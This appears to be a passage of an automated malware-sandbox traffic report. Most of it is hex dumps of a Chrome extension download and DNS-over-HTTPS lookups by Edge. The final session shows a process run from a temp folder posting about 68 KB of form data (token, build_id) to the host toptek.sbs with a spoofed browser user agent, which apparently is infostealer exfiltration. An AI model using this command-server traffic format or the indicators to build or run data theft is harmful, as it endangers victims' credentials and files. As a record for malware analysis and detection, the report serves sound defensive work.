                                                                                                                                                                                                                                                                                                  Date: Sun, 22 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Expires: Mon, 22 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                                                  Age: 48376
                                                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC820INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c
                                                                                                                                                                                                                                                                                                  Data Ascii: <Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rt
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: b0 78 c3 9a 50 64 5d fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75
                                                                                                                                                                                                                                                                                                  Data Ascii: xPd]@uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[u
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: d6 e1 6d c0 c8 18 51 ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17
                                                                                                                                                                                                                                                                                                  Data Ascii: mQVkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iG
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: d9 c3 10 d6 1f b2 cd fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d
                                                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                                                                                                                                                  Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                                                  Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                                                  Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                                                  Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                                                  Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  25192.168.2.549950162.159.61.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfc7eb27d06-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom ()


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  26192.168.2.549951172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfcc9a441de-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a5 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  27192.168.2.549952172.64.41.34436772C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:30 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:24:30 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                  CF-RAY: 8f65ecfd39f741de-EWR
                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 a5 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  28192.168.2.54996194.130.188.574431576C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                                  Content-Length: 68733
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-23 05:24:31 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 38 32 62 32 38 63 66 63 32 36 64 35 61 61 35 30 32 39 32 66 36 35 35 33 30 36 35 33 30 32 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="token"0e82b28cfc26d5aa50292f6553065302------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------C2VKNG4E3W47YMGLXB1NCont
